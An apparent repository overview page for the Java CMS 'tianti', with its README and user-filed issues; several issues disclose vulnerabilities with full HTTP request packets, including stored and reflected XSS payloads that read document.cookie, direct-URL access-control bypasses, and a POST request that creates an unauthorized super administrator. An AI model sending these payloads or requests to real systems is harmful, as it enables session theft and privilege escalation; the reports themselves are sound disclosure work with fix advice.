xujeff / tianti

Lightweight Java CMS solution: Tianti. Tianti is a back-end CMS solution built with Java-related technologies; users can extend it to fit their own business, and it also provides code-generation tools for the dao, service and similar layers. Technology stack: Spring Data JPA, Hibernate, Shiro, Spring MVC, Layer, MySQL, etc.

License: Apache License 2.0

Java 95.32% HTML 4.68%
java cms spring-mvc hibernate spring-data-jpa layer shiro mysql

tianti's Introduction

Tianti (tianti)

Introduction to Tianti (tianti-tool):

1. Tianti is a free, lightweight CMS written in Java; it currently provides a complete solution from back-end administration to front-end presentation.
2. Users can build a CMS site in the default style without writing a single line of code.
3. The front-end pages are responsive, supporting both PC and H5 (mobile), and are implemented with front-end/back-end separation. The back end supports switching between the "Tianti blue" and "Tianti red" skins.
4. The project has clear technical layering; users can extend it according to their own business modules, which makes secondary development convenient.

Technical architecture:

 1. Technology stack:
    Back end
     ·Core framework: Spring Framework 4.2.5.RELEASE
     ·Security framework: Apache Shiro 1.3.2
     ·View framework: Spring MVC 4.2.5.RELEASE
     ·Database connection pool: Tomcat JDBC
     ·Cache framework: Ehcache
     ·ORM framework: Spring Data JPA, Hibernate 4.3.5.Final
     ·Logging: SLF4J 1.7.21, Log4j
     ·Editor: ueditor
     ·Utilities: Apache Commons, Jackson 2.8.5, POI 3.15
     ·View layer: JSP
     ·Database: MySQL, Oracle and other relational databases

    Front end
     ·DOM: jQuery
     ·Pagination: jquery.pagination
     ·UI management: common
     ·UI integration: uiExtend
     ·Scrollbar: jquery.nicescroll.min.js
     ·Charts: highcharts
     ·3D charts: highcharts-more
     ·Carousel: jquery-swipe
     ·Form submission: jquery.form
     ·File upload: jquery.uploadify
     ·Form validation: jquery.validator
     ·Tree view: jquery.ztree
     ·HTML template engine: template
 2. Project structure:
   2.1. tianti-common: basic system service abstractions, including the base abstractions for entity, dao and service;
   2.2. tianti-org: user and permission module service implementation;
   2.3. tianti-cms: news/content module service implementation;
   2.4. tianti-module-admin: the Tianti back-end (admin) web project;
   2.5. tianti-module-interface: the Tianti API project;
   2.6. tianti-module-gateway: the Tianti responsive front-end project (a static project that calls tianti-module-interface to fetch its data);


 Front-end project overview:
[screenshots: PC pages; H5 pages]
Back-end project overview:
[screenshots: Tianti login page; Tianti blue style (default); Tianti red style]

tianti's People

Contributors

jianfangxu, xujeff

tianti's Issues

How to optimize SEO

The project architecture is good, but it is not friendly to crawlers and spiders at all.

17-Jul-2017 15:29:47.745 SEVERE [localhost-startStop-1] org.apache.tomcat.jdbc.pool.ConnectionPool.init Unable to create initial connections of pool. java.sql.SQLException: java.lang.ClassCastException: java.math.BigInteger cannot be cast to java.lang.Long

17-Jul-2017 15:29:47.745 SEVERE [localhost-startStop-1] org.apache.tomcat.jdbc.pool.ConnectionPool.init Unable to create initial connections of pool.
java.sql.SQLException: java.lang.ClassCastException: java.math.BigInteger cannot be cast to java.lang.Long
at com.mysql.jdbc.SQLError.createSQLException(SQLError.java:1074)
at com.mysql.jdbc.SQLError.createSQLException(SQLError.java:988)
at com.mysql.jdbc.SQLError.createSQLException(SQLError.java:974)
at com.mysql.jdbc.SQLError.createSQLException(SQLError.java:919)
at com.mysql.jdbc.ConnectionImpl.buildCollationMapping(ConnectionImpl.java:1041)
at com.mysql.jdbc.ConnectionImpl.initializePropsFromServer(ConnectionImpl.java:3496)
at com.mysql.jdbc.ConnectionImpl.connectOneTryOnly(ConnectionImpl.java:2460)
at com.mysql.jdbc.ConnectionImpl.createNewIO(ConnectionImpl.java:2230)
at com.mysql.jdbc.ConnectionImpl.<init>(ConnectionImpl.java:813)
at com.mysql.jdbc.JDBC4Connection.<init>(JDBC4Connection.java:47)
at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
at java.lang.reflect.Constructor.newInstance(Constructor.java:423)
at com.mysql.jdbc.Util.handleNewInstance(Util.java:411)
at com.mysql.jdbc.ConnectionImpl.getInstance(ConnectionImpl.java:399)
at com.mysql.jdbc.NonRegisteringDriver.connect(NonRegisteringDriver.java:334)
at org.apache.tomcat.jdbc.pool.PooledConnection.connectUsingDriver(PooledConnection.java:307)
at org.apache.tomcat.jdbc.pool.PooledConnection.connect(PooledConnection.java:200)
at org.apache.tomcat.jdbc.pool.ConnectionPool.createConnection(ConnectionPool.java:708)
at org.apache.tomcat.jdbc.pool.ConnectionPool.borrowConnection(ConnectionPool.java:642)
at org.apache.tomcat.jdbc.pool.ConnectionPool.init(ConnectionPool.java:464)
at org.apache.tomcat.jdbc.pool.ConnectionPool.<init>(ConnectionPool.java:141)
at org.apache.tomcat.jdbc.pool.DataSourceProxy.pCreatePool(DataSourceProxy.java:115)
at org.apache.tomcat.jdbc.pool.DataSourceProxy.createPool(DataSourceProxy.java:102)
at org.apache.tomcat.jdbc.pool.DataSourceProxy.getConnection(DataSourceProxy.java:126)
at org.springside.modules.persistence.Hibernates.getJdbcUrlFromDataSource(Hibernates.java:57)
at org.springside.modules.persistence.Hibernates.getDialect(Hibernates.java:36)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.springframework.beans.factory.support.SimpleInstantiationStrategy.instantiate(SimpleInstantiationStrategy.java:162)
at org.springframework.beans.factory.support.ConstructorResolver.instantiateUsingFactoryMethod(ConstructorResolver.java:588)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateUsingFactoryMethod(AbstractAutowireCapableBeanFactory.java:1123)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBeanInstance(AbstractAutowireCapableBeanFactory.java:1018)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:510)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveInnerBean(BeanDefinitionValueResolver.java:299)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveValueIfNecessary(BeanDefinitionValueResolver.java:122)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.applyPropertyValues(AbstractAutowireCapableBeanFactory.java:1481)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1226)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveReference(BeanDefinitionValueResolver.java:351)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveValueIfNecessary(BeanDefinitionValueResolver.java:108)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.applyPropertyValues(AbstractAutowireCapableBeanFactory.java:1481)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1226)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveReference(BeanDefinitionValueResolver.java:351)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveValueIfNecessary(BeanDefinitionValueResolver.java:108)
at org.springframework.beans.factory.support.ConstructorResolver.resolveConstructorArguments(ConstructorResolver.java:634)
at org.springframework.beans.factory.support.ConstructorResolver.instantiateUsingFactoryMethod(ConstructorResolver.java:444)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateUsingFactoryMethod(AbstractAutowireCapableBeanFactory.java:1123)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBeanInstance(AbstractAutowireCapableBeanFactory.java:1018)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:510)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.findAutowireCandidates(DefaultListableBeanFactory.java:1192)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1116)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1014)
at org.springframework.beans.factory.annotation.AutowiredAnnotationBeanPostProcessor$AutowiredFieldElement.inject(AutowiredAnnotationBeanPostProcessor.java:545)
at org.springframework.beans.factory.annotation.InjectionMetadata.inject(InjectionMetadata.java:88)
at org.springframework.beans.factory.annotation.AutowiredAnnotationBeanPostProcessor.postProcessPropertyValues(AutowiredAnnotationBeanPostProcessor.java:331)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1214)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:296)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.findAutowireCandidates(DefaultListableBeanFactory.java:1192)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1116)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1014)
at org.springframework.beans.factory.annotation.AutowiredAnnotationBeanPostProcessor$AutowiredFieldElement.inject(AutowiredAnnotationBeanPostProcessor.java:545)
at org.springframework.beans.factory.annotation.InjectionMetadata.inject(InjectionMetadata.java:88)
at org.springframework.beans.factory.annotation.AutowiredAnnotationBeanPostProcessor.postProcessPropertyValues(AutowiredAnnotationBeanPostProcessor.java:331)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1214)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.findAutowireCandidates(DefaultListableBeanFactory.java:1192)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1116)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1014)
at org.springframework.beans.factory.annotation.AutowiredAnnotationBeanPostProcessor$AutowiredFieldElement.inject(AutowiredAnnotationBeanPostProcessor.java:545)
at org.springframework.beans.factory.annotation.InjectionMetadata.inject(InjectionMetadata.java:88)
at org.springframework.beans.factory.annotation.AutowiredAnnotationBeanPostProcessor.postProcessPropertyValues(AutowiredAnnotationBeanPostProcessor.java:331)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1214)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveReference(BeanDefinitionValueResolver.java:351)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveValueIfNecessary(BeanDefinitionValueResolver.java:108)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.applyPropertyValues(AbstractAutowireCapableBeanFactory.java:1481)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1226)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:197)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveReference(BeanDefinitionValueResolver.java:351)
at org.springframework.beans.factory.support.BeanDefinitionValueResolver.resolveValueIfNecessary(BeanDefinitionValueResolver.java:108)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.applyPropertyValues(AbstractAutowireCapableBeanFactory.java:1481)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.populateBean(AbstractAutowireCapableBeanFactory.java:1226)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:543)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)
at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:306)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:302)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:202)
at org.springframework.context.support.PostProcessorRegistrationDelegate.registerBeanPostProcessors(PostProcessorRegistrationDelegate.java:240)
at org.springframework.context.support.AbstractApplicationContext.registerBeanPostProcessors(AbstractApplicationContext.java:687)
at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:523)
at org.springframework.web.context.ContextLoader.configureAndRefreshWebApplicationContext(ContextLoader.java:444)
at org.springframework.web.context.ContextLoader.initWebApplicationContext(ContextLoader.java:326)
at org.springframework.web.context.ContextLoaderListener.contextInitialized(ContextLoaderListener.java:107)
at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4842)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5303)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:147)
at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:725)
at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:701)
at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:717)
at org.apache.catalina.startup.HostConfig.deployWAR(HostConfig.java:940)
at org.apache.catalina.startup.HostConfig$DeployWar.run(HostConfig.java:1816)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
Caused by: java.lang.ClassCastException: java.math.BigInteger cannot be cast to java.lang.Long
at com.mysql.jdbc.ConnectionImpl.buildCollationMapping(ConnectionImpl.java:992)
... 145 more

There are some XSS flaws in your project

Hello, guy, I'm sorry to tell you that your project has so many XSS flaws.

First of all, the user list module has a stored XSS, which can cause cookie disclosure and privilege escalation.
The following picture is the proof of this flaw:
[screenshot]

Packet:
```http
POST /tianti-module-admin/user/ajax/save_role HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 329
Accept: */*
Origin: http://127.0.0.1:8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://127.0.0.1:8080/tianti-module-admin/user/role_list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=495723A0467ADD3C57A1956E39426E2C; csrftoken=4YqHpDZtkQJbqwTt9bcAqP6UJjUtUdCEjVY42Q2p337RkWfOoFjxK3rnH2gM75Eb
Connection: close

id=2c9025ab5a6f2b85015a6f2cef950000&name=%E6%9D%83%E9%99%90%E7%AE%A1%E7%90%86%E5%91%98%22%3E%3Cimg+src%3Di+onerror%3Dalert(document.cookie)&description=%E5%8F%AF%E4%BB%A5%E5%88%86%E9%85%8D%E5%90%8E%E5%8F%B0%E7%94%A8%E6%88%B7&rescoureIds=70&rescoureIds=71&rescoureIds=72&rescoureIds=73&rescoureIds=2c9025ab5adb1eef015adb2e74b90000
```

Payload:
```html
"><img src=i onerror=alert(1)>
```
The following is the description of this flaw according to the code.
[screenshot]

The path of this piece of code is: tianti-module-admin\src\main\webapp\WEB-INF\views\user\user_list.jsp.
user_list.jsp receives the value from the "controller" and displays it without any defensive measures.
Here is the "usercontroller", where we can see the request parameters being taken from users:

[screenshot]
It puts the user info into the User object. This object will be returned to the "view" by an ajax method.
And as we can see, it doesn't have any defensive measures.
[screenshot]

Secondly, in the article management module there also exists a stored XSS.
The following picture is the proof of this flaw:

[screenshot]

And the following is the entry point of the flaw:

[screenshot]

Thirdly, in the user management module there exists a reflected XSS.

This functional module is created to look up user info by the keyword the user entered.
[screenshot]

Packet:
```http
POST /tianti-module-admin/user/list HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 68
Cache-Control: max-age=0
Origin: http://127.0.0.1:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1:8080/tianti-module-admin/user/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=495723A0467ADD3C57A1956E39426E2C; csrftoken=4YqHpDZtkQJbqwTt9bcAqP6UJjUtUdCEjVY42Q2p337RkWfOoFjxK3rnH2gM75Eb
Connection: close

userName=%22%3E%3Cimg+src%3Di+onerror%3Dalert%281%29%3E&currentPage=
```

Payload:
```html
"><img src=i onerror=alert(document.cookie)>
```
Advice:
You can create a global interceptor to intercept the user requests and check whether they contain potential threats, and you should also create another global interceptor to intercept the response and replace the special characters with entities.
Hope you guys fix the flaws quickly; if you have any questions, please contact me at the following e-mail address:
[email protected]
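As an added example (not code from the tianti project or from the reporter), the following Java helper shows the output-encoding step that the user_list.jsp and ajax paths described above are missing: the untrusted value is HTML-entity encoded at the moment it is written into the page, so the reporter's payload is rendered as literal text instead of creating an element. The class, the `renderUserRow` fragment and the sample values are constructed for illustration.

```java
/**
 * Output encoding for untrusted values rendered into HTML (added example,
 * not part of the tianti code base). The five characters handled below are
 * the ones that let data break out of a text node or a quoted attribute.
 */
public final class HtmlOutputEncoder {

    private HtmlOutputEncoder() {}

    /** Encode a value for insertion into HTML text or a double-quoted attribute. */
    public static String escapeHtml(String value) {
        if (value == null) {
            return "";
        }
        StringBuilder sb = new StringBuilder(value.length() + 16);
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /**
     * Hypothetical fragment of the user-list table. Every value that came from
     * a request or the database passes through escapeHtml, whether it lands in
     * a text node (first cell) or in an attribute (second cell).
     */
    public static String renderUserRow(String userName, String realName) {
        return "<tr><td>" + escapeHtml(userName) + "</td>"
             + "<td><input value=\"" + escapeHtml(realName) + "\"></td></tr>";
    }

    public static void main(String[] args) {
        // Constructed sample: the payload quoted in the report above.
        String payload = "\"><img src=i onerror=alert(document.cookie)>";
        System.out.println(renderUserRow(payload, payload));
        // The output contains &quot;&gt;&lt;img ...: the browser displays the
        // text and no <img> element (and so no onerror handler) is created.
    }
}
```

In the JSP itself the same effect comes from JSTL's `<c:out value="${user.username}"/>`, which escapes XML by default, instead of emitting `${user.username}` directly; for values inserted by the ajax calls the report mentions, use the DOM `textContent` property (or jQuery's `.text()`) rather than `.html()`. Encoding at output time is preferable to the request-side rewriting the report suggests, because the same stored value may later be emitted into a different context (an attribute, a JSON response, an Excel export) that needs a different encoding, and rewriting input also corrupts legitimate data such as a description containing `<`.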

How do I initialize this system?

I downloaded the source code, built several war packages and put them under webapps, and got a "mysql root@localhost access denied" error.

I tried to modify the jdbc parameters and found that there are actually 4 files, which is quite confusing:

```
./tianti-module-admin/WEB-INF/classes/application.development.properties:jdbc.username=root
./tianti-module-admin/WEB-INF/classes/application.production.properties:jdbc.username=root
./tianti-module-admin/WEB-INF/classes/applicationContext.xml:			<property name="username" value="${jdbc.username}" />
./tianti-module-admin/WEB-INF/classes/applicationContext.xml:			<property name="username" value="${jdbc.username}" />
./tianti-module-interface/WEB-INF/classes/application.development.properties:jdbc.username=root
./tianti-module-interface/WEB-INF/classes/application.production.properties:jdbc.username=root
./tianti-module-interface/WEB-INF/classes/applicationContext.xml:			<property name="username" value="${jdbc.username}" />
./tianti-module-interface/WEB-INF/classes/applicationContext.xml:			<property name="username" value="${jdbc.username}" />
```

Is this project still maintained? The back end opens to a 404 and the front end throws a pile of JS errors; could you write some initialization documentation?

There is an incorrect access control flaw in your project

Hello, guy, there is an incorrect access control flaw in your project.

The following is the proof of this flaw.
There are two roles in the project, the permission role and the super administrator role. The permission role only has the permission to change the permissions of users, and the super administrator role has all of the permissions, which include permission management, content management and skin management.
When we log in with the super administrator role, we can see:
[screenshot]
As the picture shows, the super administrator has three permissions.
When we log in with the permission role, we can see:
[screenshot]
As the picture shows, the permission role has only one permission.

How does the flaw happen?
We know that if the back-end controller doesn't check the permission of the role, it will cause an incorrect access control flaw.
See the code of the cmscontroller; the path of the cmscontroller is:
tianti-module-admin\src\main\java\com\jeff\tianti\controller\cmscontroller.java
[screenshot]
In this place, we can see it uses the Spring framework: the request "/column/list" maps to a function called columnList. It doesn't do a permission check, which causes the incorrect access control flaw.
How to prove it?
We request the URL "http://127.0.0.1:8080/tianti-module-admin/cms/column/list" directly.
[screenshot]
We can see that the permission role can access the column list page, and it can edit the columns too.
[screenshot]

And in the skin management there exists incorrect access control, too.
We can use the permission role to access the URL "http://127.0.0.1:8080/tianti-module-admin/user/skin/list"

[screenshot]
We can locate the flawed code in
tianti-module-admin\src\main\java\com\jeff\tianti\controller\usercontroller.java
[screenshot]
It maps the request "/skin/list" to the function skinList and doesn't do a permission check.

Advice:
[screenshot]
Before executing the main logic of the function where the controller receives the request from the front end, please do a permission check.

Hope you guys fix this flaw quickly; if you have any questions, please contact me by e-mail:
[email protected]

Login failure

```java
import java.util.List;
import org.springframework.data.jpa.repository.Query;

public interface UserDao extends SystemUserDao, CommonDao<User, String> {

    // JPQL: looks up non-deleted users by the `username` attribute of the User entity
    @Query("select u from User u where u.deleteFlag = 0 and u.username = ?1 ")
    List<User> findUserByName(String userName);
}
```

The field used at login and the field in the SQL are inconsistent, so login fails.
The table structure is as follows:

```sql
CREATE TABLE org_user (
  id varchar(32) NOT NULL,
  audit_flag varchar(2) DEFAULT NULL,
  create_date datetime DEFAULT NULL,
  delete_flag varchar(1) DEFAULT NULL,
  update_date datetime DEFAULT NULL,
  email varchar(30) DEFAULT NULL,
  mobile varchar(20) DEFAULT NULL,
  password varchar(32) DEFAULT NULL,
  real_name varchar(50) DEFAULT NULL,
  status int(11) DEFAULT NULL,
  username varchar(50) DEFAULT NULL,
  type int(11) DEFAULT '0',
  current_skin varchar(16) DEFAULT NULL,
  PRIMARY KEY (id)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
```

Unauthorized addition of administrator vulnerabilities

The premise is that there is a login state.

  1. Create a low-privileged user
    [screenshot]
    Send a POST request as follows:
```http
POST /tianti-module-admin/user/ajax/save HTTP/1.1
Host: localhost:8888
Content-Length: 357
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8888/tianti-module-admin/user/ajax/save_role
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4D9EA7A684D3CE5B2CBAF30D714E0B0A; _jspxcms=0bdeaa17af6448558d5181a98d4df1a0; Hm_lvt_57e9a5bfc4003c9bc1fd23dba7598170=1664259891; Phpstorm-66f14989=68db331b-21f1-4319-88e3-036932e5e8ad; _jpanonym="MGUyNzc1N2NmY2QwZTA0MDk4YzBlN2ZjNTY2YzBjYTQjMTY2ODM0MDQ1NjU5MCMzMTUzNjAwMCNOekkyTXpOaE1tVXpZak5sTkRCallqaGtORFZtTm1abE5qUm1OV1V4WkRRPQ=="; Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a=1668340479; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1669038142,1669101592,1669167302; Hm_lvt_1040d081eea13b44d84a4af639640d51=1669203862; __bid_n=184a44da31c5abff074207; PUBLICCMS_ANALYTICS_ID=129faf04-65fd-46b0-8d88-56f21d780fe5; PUBLICCMS_ADMIN=1_e45b8556-ed10-4917-a0f5-8e9fc43a2828; JSESSIONID=d2e34d48-bb9d-4174-a34e-dff5b868def8
Connection: close

id=&username=123456789&password=123456&realName=&mobile=&roleId=402881e457f075530157f0791e2f0000
```

[screenshot]
At this point we can log in as the super administrator 123456789
[screenshot]
